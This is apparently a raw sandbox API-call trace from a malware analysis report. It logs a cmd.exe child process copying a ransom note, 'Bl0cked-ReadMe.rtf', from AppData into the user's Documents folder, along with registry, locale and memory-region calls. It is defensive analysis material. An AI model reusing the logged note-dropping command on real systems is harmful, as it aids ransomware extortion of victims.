lpNumberOfCharsWritten=0x14eb54, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x14eb54*=0x1a) returned 1 [0235.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.383] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.383] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.383] SetConsoleInputExeNameW () returned 0x1 [0235.383] GetConsoleOutputCP () returned 0x1b5 [0235.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.383] exit (_Code=0) Process: id = "635" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35058 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35059 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35060 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35061 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35062 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35063 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35064 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35065 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35066 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 35067 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35162 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35163 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35164 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 35165 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 35166 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35167 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35168 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35169 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35170 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35171 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35172 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35173 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35174 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35175 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35176 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35177 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35178 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35179 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35180 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 35181 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35182 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35183 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35184 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 35185 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 875 os_tid = 0x740 [0234.483] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f874 | out: lpSystemTimeAsFileTime=0x14f874*(dwLowDateTime=0xbf39d4e0, dwHighDateTime=0x1d440a9)) [0234.483] GetCurrentProcessId () returned 0xaa0 [0234.483] GetCurrentThreadId () returned 0x740 [0234.483] GetTickCount () returned 0x40675 [0234.483] QueryPerformanceCounter (in: lpPerformanceCount=0x14f86c | out: lpPerformanceCount=0x14f86c*=29127250224) returned 1 [0234.484] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.484] __set_app_type (_Type=0x1) [0234.484] __p__fmode () returned 0x76b331f4 [0234.484] __p__commode () returned 0x76b331fc [0234.484] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.484] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.484] GetCurrentThreadId () returned 0x740 [0234.484] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x740) returned 0x38 [0234.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.484] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.484] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.485] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f804 | out: phkResult=0x14f804*=0x0) returned 0x2 [0234.485] VirtualQuery (in: lpAddress=0x14f83b, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.485] GetConsoleOutputCP () returned 0x1b5 [0234.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.485] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.485] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.485] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.486] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.486] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.486] GetEnvironmentStringsW () returned 0x1b0188* [0234.486] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0234.486] GetEnvironmentStringsW () returned 0x1b0188* [0234.486] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0234.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e774 | out: phkResult=0x14e774*=0x40) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0xb0, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x0, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegCloseKey (hKey=0x40) returned 0x0 [0234.486] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e774 | out: phkResult=0x14e774*=0x40) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x0, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.487] RegCloseKey (hKey=0x40) returned 0x0 [0234.487] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.487] srand (_Seed=0x5b8863c2) [0234.487] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0234.487] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0234.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.487] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.488] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.488] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.488] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.488] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.488] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.488] GetEnvironmentStringsW () returned 0x1b22d8* [0234.488] FreeEnvironmentStringsW (penv=0x1b22d8) returned 1 [0234.488] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.488] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.488] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.488] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.488] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.488] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.488] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.488] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f540, lpFilePart=0x14f53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f53c*="Desktop") returned 0x18 [0234.488] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.488] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.489] GetEnvironmentStringsW () returned 0x1b2af8* [0234.489] FreeEnvironmentStringsW (penv=0x1b2af8) returned 1 [0234.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.490] GetConsoleOutputCP () returned 0x1b5 [0234.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.490] GetUserDefaultLCID () returned 0x409 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f680, cchData=128 | out: lpLCData="0") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f680, cchData=128 | out: lpLCData="0") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f680, cchData=128 | out: lpLCData="1") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.491] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.491] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.491] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.492] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.492] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.492] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.492] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.492] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.492] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.492] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.492] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.492] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] GetFileType (hFile=0x7) returned 0x2 [0234.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f578 | out: lpMode=0x14f578) returned 1 [0234.496] _dup (_FileHandle=1) returned 3 [0234.496] _close (_FileHandle=1) returned 0 [0234.496] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.497] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f548, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.497] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.497] GetConsoleTitleW (in: lpConsoleTitle=0x14f378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.497] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.497] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.497] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.497] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.498] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14eedc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eedc) returned 0x1a0e78 [0234.498] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.498] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.498] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14dde8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.498] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.498] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.498] GetFileType (hFile=0x54) returned 0x1 [0234.498] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.498] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14de40 | out: lpFileSizeHigh=0x14de40*=0x0) returned 